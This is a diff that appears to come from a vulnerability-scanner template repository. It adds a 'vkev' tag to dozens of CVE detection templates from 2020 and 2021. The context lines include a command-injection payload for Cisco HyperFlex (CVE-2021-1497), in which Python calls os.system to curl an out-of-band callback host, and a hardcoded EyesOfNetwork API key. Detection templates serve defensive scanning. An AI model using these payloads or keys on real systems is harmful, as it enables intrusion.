+31,7 @@ info: - html:"OpenTSDB" - http.html:"opentsdb" fofa-query: body="opentsdb" - tags: cve,cve2020,opentsdb,rce,packetstorm + tags: cve,cve2020,opentsdb,rce,packetstorm,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index f30bd1f4682..12ec8478c96 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: searchblox product: searchblox - tags: cve2020,cve,lfi,searchblox + tags: cve2020,cve,lfi,searchblox,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index d20e5f57e4d..a196fa0a475 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: linksys product: re6500_firmware - tags: cve,cve2020,linksys,rce,oast,router + tags: cve,cve2020,linksys,rce,oast,router,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index fb7770cc551..053f99ee012 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: cisco product: firepower_threat_defense - tags: cve,cve2020,xss,cisco,kev + tags: cve,cve2020,xss,cisco,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 2df6c217f23..d6959dedc6b 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cse_bookstore_project product: cse_bookstore - tags: cve,cve2020,sqli,cse,edb,tenable,cse_bookstore_project + tags: cve,cve2020,sqli,cse,edb,tenable,cse_bookstore_project,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-36155.yaml b/http/cves/2020/CVE-2020-36155.yaml index d46fac02e8a..e72be5bbd20 100644 --- a/http/cves/2020/CVE-2020-36155.yaml +++ b/http/cves/2020/CVE-2020-36155.yaml @@ -28,7 +28,7 @@ info: publicwww-query: "/wp-content/plugins/ultimate-member" fofa-query: body="/wp-content/plugins/ultimate-member" shodan-query: "http.html:/wp-content/plugins/ultimate-member/" - tags: cve,cve2020,wordpress,wp-plugin,wp,wpscan,ultimate-member,intrusive,privesc + tags: cve,cve2020,wordpress,wp-plugin,wp,wpscan,ultimate-member,intrusive,privesc,vkev flow: http(1) && http(2) && http(3) diff --git a/http/cves/2020/CVE-2020-36333.yaml b/http/cves/2020/CVE-2020-36333.yaml index 96513d3c89f..c9776ff35b4 100644 --- a/http/cves/2020/CVE-2020-36333.yaml +++ b/http/cves/2020/CVE-2020-36333.yaml @@ -22,7 +22,7 @@ info: product: themegrill-demo-importer vendor: themegrill fofa-query: body="/plugins/themegrill-demo-importer" - tags: cve,cve2020,wp,wordpress,wp-plugin,themegrill + tags: cve,cve2020,wp,wordpress,wp-plugin,themegrill,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-36708.yaml b/http/cves/2020/CVE-2020-36708.yaml index ca6ceaf3a46..5b99bcf6692 100644 --- a/http/cves/2020/CVE-2020-36708.yaml +++ b/http/cves/2020/CVE-2020-36708.yaml @@ -33,7 +33,7 @@ info: product: activello kev: true vkev: true - tags: wordpress,rce,cve,cve2020,edb,wpscan + tags: wordpress,rce,cve,cve2020,edb,wpscan,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-36728.yaml b/http/cves/2020/CVE-2020-36728.yaml index 202e297b0c4..45631b7c26a 100644 --- a/http/cves/2020/CVE-2020-36728.yaml +++ b/http/cves/2020/CVE-2020-36728.yaml @@ -25,7 +25,7 @@ info: product: adning_advertising framework: wordpress fofa-query: body="served by Adning" - tags: cve,cve202,wordpress,wp,wp-plugin,intrusive,file-upload,adning,rce + tags: cve,cve202,wordpress,wp,wp-plugin,intrusive,file-upload,adning,rce,vkev flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-36731.yaml b/http/cves/2020/CVE-2020-36731.yaml index 27923e2210a..171ae6f731b 100644 --- a/http/cves/2020/CVE-2020-36731.yaml +++ b/http/cves/2020/CVE-2020-36731.yaml @@ -25,7 +25,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/flexible-checkout-fields/" publicwww-query: "/wp-content/plugins/flexible-checkout-fields/" - tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss + tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss,vkev flow: http(1) && http(2) && http(3) diff --git a/http/cves/2020/CVE-2020-36836.yaml b/http/cves/2020/CVE-2020-36836.yaml index 7e448b22967..51550f90302 100644 --- a/http/cves/2020/CVE-2020-36836.yaml +++ b/http/cves/2020/CVE-2020-36836.yaml @@ -29,7 +29,7 @@ info: shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/" fofa-query: "body=/wp-content/plugins/wp-fastest-cache/" publicwww-query: "/wp-content/plugins/wp-fastest-cache/" - tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache + tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache,vkev variables: target_path: "languages" diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index f78a6f5e8c3..b0e02def834 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -33,7 +33,7 @@ info: product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 fofa-query: icon_hash=-399298961 - tags: cve,cve2020,ibm,xxe,disclosure + tags: cve,cve2020,ibm,xxe,disclosure,vkev http: - method: POST diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 727ade7ed74..15118a9c672 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_config - tags: cve,cve2020,lfi,springcloud,config,traversal,kev,vmware + tags: cve,cve2020,lfi,springcloud,config,traversal,kev,vmware,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index d996592d223..0fc1933383f 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_netflix - tags: cve,cve2020,ssrf,springcloud,vmware + tags: cve,cve2020,ssrf,springcloud,vmware,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-5766.yaml b/http/cves/2020/CVE-2020-5766.yaml index 24b6b83d223..14fc4c00fee 100644 --- a/http/cves/2020/CVE-2020-5766.yaml +++ b/http/cves/2020/CVE-2020-5766.yaml @@ -22,7 +22,7 @@ info: product: srs_simple_hits_counter framework: wordpress publicwww-query: "/wp-content/plugins/srs-simple-hits-counter/" - tags: cve,cve2020,srs-simple-hits-counter,wordpress,wp,wp-plugin,time-based-sqli,sqli + tags: cve,cve2020,srs-simple-hits-counter,wordpress,wp,wp-plugin,time-based-sqli,sqli,vkev flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 456eaa6b833..81413b808c1 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: instructure product: canvas_learning_management_service - tags: cve,cve2020,ssrf,oast,blind,tenable,instructure + tags: cve,cve2020,ssrf,oast,blind,tenable,instructure,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index f3fe3b597b8..90fb7a8fe23 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Magento" - http.component:"magento" - tags: cve,cve2020,magmi,magento,tenable,magmi_project + tags: cve,cve2020,magmi,magento,tenable,magmi_project,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index 9d79947f95f..88308992b8e 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: unraid product: unraid - tags: cve2020,cve,rce,kev,unraid + tags: cve2020,cve,rce,kev,unraid,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index 4b8ecf51230..7af9b476a86 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -37,7 +37,7 @@ info: shodan-query: http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve,cve2020,bigip,rce,kev,packetstorm,f5 + tags: cve,cve2020,bigip,rce,kev,packetstorm,f5,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 6fb70d94cdd..0c967b22110 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: sap product: solution_manager - tags: cve2020,cve,sap,solman,rce,kev + tags: cve2020,cve,sap,solman,rce,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index 2aa0d7ee53a..aba6143429d 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -29,7 +29,7 @@ info: product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 fofa-query: icon_hash=-266008933 - tags: cve,cve2020,sap,kev + tags: cve,cve2020,sap,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 660a5336ca0..d4326a8183d 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: sap product: businessobjects_business_intelligence_platform - tags: cve2020,cve,sap,ssrf,oast,unauth + tags: cve2020,cve,sap,ssrf,oast,unauth,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index beeda2a5f83..f761c0702a7 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: hpe product: smart_update_manager - tags: cve,cve2020,hp,auth-bypass,hpe,tenable + tags: cve,cve2020,hp,auth-bypass,hpe,tenable,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 5a538aa56f3..58864b46bd5 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: hp product: linuxki - tags: cve,cve2020,rce,packetstorm,hp + tags: cve,cve2020,rce,packetstorm,hp,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index c3358a935d6..3f5f5e03ff9 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: cve,cve2020,zimbra,ssrf,oast,synacor + tags: cve,cve2020,zimbra,ssrf,oast,synacor,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 10a8d6a9a68..ec538dfb5ab 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -29,7 +29,7 @@ info: - http.favicon.hash:129457226 - cpe:"cpe:2.3:a:liferay:liferay_portal" fofa-query: icon_hash=129457226 - tags: cve2020,cve,packetstorm,rce,liferay,kev + tags: cve2020,cve,packetstorm,rce,liferay,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index d1e8e0191c8..61d41850194 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -32,7 +32,7 @@ info: - http.title:"intellian aptus web" fofa-query: title="intellian aptus web" google-query: intitle:"intellian aptus web" - tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech + tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 3c709c43de0..aaa94c5307b 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -34,7 +34,7 @@ info: - icon_hash=106844876 - title="revive adserver" google-query: intitle:"revive adserver" - tags: cve,cve2020,xss,hackerone,revive-adserver + tags: cve,cve2020,xss,hackerone,revive-adserver,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 5c5247bcde9..1102b804382 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: citrix product: application_delivery_controller_firmware - tags: cve,cve2020,citrix,xss + tags: cve,cve2020,citrix,xss,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index a611d66e9ba..0c5cdd22dab 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -27,7 +27,7 @@ info: max-request: 6 vendor: citrix product: application_delivery_controller_firmware - tags: cve2020,cve,citrix,lfi,kev,packetstorm + tags: cve2020,cve,citrix,lfi,kev,packetstorm,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 807524fa4fd..e971b57d772 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: citrix product: application_delivery_controller_firmware - tags: cve,cve2020,citrix + tags: cve,cve2020,citrix,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 65b75229d12..c9c7a1c698d 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -32,7 +32,7 @@ info: max-request: 1 vendor: citrix product: xenmobile_server - tags: cve2020,cve,citrix,lfi,xenmobile + tags: cve2020,cve,citrix,lfi,xenmobile,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 101b71308cd..3902f4af97e 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: draytek product: vigor2960_firmware - tags: cve,cve2020,rce,kev,draytek + tags: cve,cve2020,rce,kev,draytek,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 3fe30c63ccd..74aa651e1bf 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: playsms product: playsms - tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce + tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-8657.yaml b/http/cves/2020/CVE-2020-8657.yaml index 9a224ee0951..3faef827597 100644 --- a/http/cves/2020/CVE-2020-8657.yaml +++ b/http/cves/2020/CVE-2020-8657.yaml @@ -28,7 +28,7 @@ info: product: eyesofnetwork shodan-query: html:"EyesOfNetwork" fofa-query: title="EyesOfNetwork" - tags: cve,cve2020,eyesofnetwork,hardcoded-key,kev + tags: cve,cve2020,eyesofnetwork,hardcoded-key,kev,vkev variables: key: "€On@piK3Y" diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index dd9affd1cb4..28a3011bdd8 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -38,7 +38,7 @@ info: google-query: - intitle:"cacti" - intitle:"login to cacti" - tags: cve2020,cve,cacti,rce,oast + tags: cve2020,cve,cacti,rce,oast,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index 584fee98f38..a57d12fda34 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: citrix product: sharefile_storagezones_controller - tags: cve2020,cve,citrix,lfi + tags: cve2020,cve,citrix,lfi,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index bc492667cfa..348b5697724 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -30,7 +30,7 @@ info: vendor: wpcentral product: wpcentral framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index d661876ed7a..0b709ee65bc 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zyxel product: nas326_firmware - tags: cve2020,cve,rce,zyxel,injection,kev + tags: cve2020,cve,rce,zyxel,injection,kev,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 6d03af24d23..26e87417b94 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve2020,cve,atlassian,jira,xss + tags: cve2020,cve,atlassian,jira,xss,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index db637944fd3..4e66797bb71 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="ofbiz" - app="apache_ofbiz" - tags: cve,cve2020,ofbiz,packetstorm,apache,java + tags: cve,cve2020,ofbiz,packetstorm,apache,java,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-9547.yaml b/http/cves/2020/CVE-2020-9547.yaml index 4841a7a08c5..92f1ab45f9f 100644 --- a/http/cves/2020/CVE-2020-9547.yaml +++ b/http/cves/2020/CVE-2020-9547.yaml @@ -27,7 +27,7 @@ info: vendor: fasterxml product: jackson-databind verified: true - tags: cve,cve2020,jackson,databind,deserialization,rce + tags: cve,cve2020,jackson,databind,deserialization,rce,vkev variables: randstr: "{{rand_text_alphanumeric(8)}}" diff --git a/http/cves/2020/CVE-2020-9548.yaml b/http/cves/2020/CVE-2020-9548.yaml index 4e6dac65eed..652ac0b9897 100644 --- a/http/cves/2020/CVE-2020-9548.yaml +++ b/http/cves/2020/CVE-2020-9548.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: fasterxml product: jackson-databind - tags: cve,cve2020,jackson,fasterxml,rce + tags: cve,cve2020,jackson,fasterxml,rce,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 49ea3250e0b..b68fbe16bd5 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -35,7 +35,7 @@ info: - icon_hash=-47932290 - body=craftcms publicwww-query: craftcms - tags: cve,cve2020,ssti,craftcms + tags: cve,cve2020,ssti,craftcms,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index cbbb37089e3..25010d09dd6 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -33,7 +33,7 @@ info: - http.html:"Cisco rv340" - http.html:"cisco rv340" fofa-query: body="cisco rv340" - tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive + tags: cve2021,cve,packetstorm,seclists,auth-bypass,injection,cisco,rce,intrusive,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index dd5c4ef40fa..e50851d0b1a 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: cisco product: hyperflex_hx_data_platform - tags: cve,cve2021,cisco,rce,oast,kev,packetstorm + tags: cve,cve2021,cisco,rce,oast,kev,packetstorm,vkev variables: cmd: 'curl http://{{interactsh-url}} -H \"User-Agent: {{useragent}}\"' payload: '123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("' diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index b37c430b757..c3b25c1fc20 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: cisco product: hyperflex_hx_data_platform - tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai + tags: cve,cve2021,kev,packetstorm,cisco,rce,oast,mirai,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index 8af40482510..69e6fb9b533 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: sonicwall product: sma_200_firmware - tags: cve2021,cve,overflow,rce,sonicwall,kev + tags: cve2021,cve,overflow,rce,sonicwall,kev,vkev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml index f2c88fe0bf0..8bbed5d59cc 100644 --- a/http/cves/2021/CVE-2021-20090.yaml +++ b/http/cves/2021/CVE-2021-20090.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: buffalo product: wsr-2533dhpl2-bk_firmware - tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable + tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index d65e05a39c9..80ecf95e94d 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: buffalo product: wsr-2533dhpl2-bk - tags: cve2021,cve,buffalo,firmware,iot,tenable + tags: cve2021,cve,buffalo,firmware,iot,tenable,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 77cf2d8fa69..fc11836b82f 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: buffalo product: wsr-2533dhpl2-bk_firmware - tags: cve2021,cve,buffalo,firmware,iot,tenable + tags: cve2021,cve,buffalo,firmware,iot,tenable,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index 4dfd3971ff2..8c6f0c251ad 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -31,7 +31,7 @@ info: - http.html:"VigorConnect" - http.html:"vigorconnect" fofa-query: body="vigorconnect" - tags: cve2021,cve,draytek,lfi,vigorconnect,tenable,kev + tags: cve2021,cve,draytek,lfi,vigorconnect,tenable,kev,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 08eeddd7908..65a5dda71c0 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -31,7 +31,7 @@ info: - http.html:"VigorConnect" - http.html:"vigorconnect" fofa-query: body="vigorconnect" - tags: cve2021,cve,draytek,lfi,vigorconnect,tenable,kev + tags: cve2021,cve,draytek,lfi,vigorconnect,tenable,kev,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index d6d0e8a850c..f241cc00e95 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: netgear product: rax43_firmware - tags: cve2021,cve,tenable,netgear,rce,router + tags: cve2021,cve,tenable,netgear,rce,router,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 8ca88289a0b..cd894384bb1 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:sixapart:movable_type" fofa-query: title="サインイン | movable type pro" google-query: intitle:"サインイン | movable type pro" - tags: cve2021,cve,packetstorm,rce,movable,sixapart + tags: cve2021,cve,packetstorm,rce,movable,sixapart,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 97cbe8cc541..2c1f1544d4a 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -37,7 +37,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve2021,cve,xss,adobe,misc,coldfusion + tags: cve2021,cve,xss,adobe,misc,coldfusion,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 05a43aa2406..01a148a494b 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -29,7 +29,7 @@ info: max-request: 4 vendor: spring-boot-actuator-logview_project product: spring-boot-actuator-logview - tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project + tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index 59ee48335d3..2ad4822b11a 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: lucee product: lucee_server - tags: cve2021,cve,rce,lucee,adobe + tags: cve2021,cve,rce,lucee,adobe,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index 91f40a4f673..3e48ef4ac93 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -38,7 +38,7 @@ info: hunter-query: - app.name="Adminer"&&web.body="4.7.8" - app.name="adminer"&&web.body="4.7.8" - tags: cve2021,cve,adminer,ssrf + tags: cve2021,cve,adminer,ssrf,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index 50143866030..cf46ed3f09c 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -27,7 +27,7 @@ info: vendor: systeminformation product: systeminformation framework: node.js - tags: cve,cve2021,nodejs,kev,systeminformation,node.js + tags: cve,cve2021,nodejs,kev,systeminformation,node.js,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 9f5cc92473d..b9d7c6d912c 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -27,7 +27,7 @@ info: vendor: buddypress product: buddypress framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress + tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 7d7863abc4e..d084fd9b940 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -38,7 +38,7 @@ info: - body="jellyfin" - title="jellyfin" || 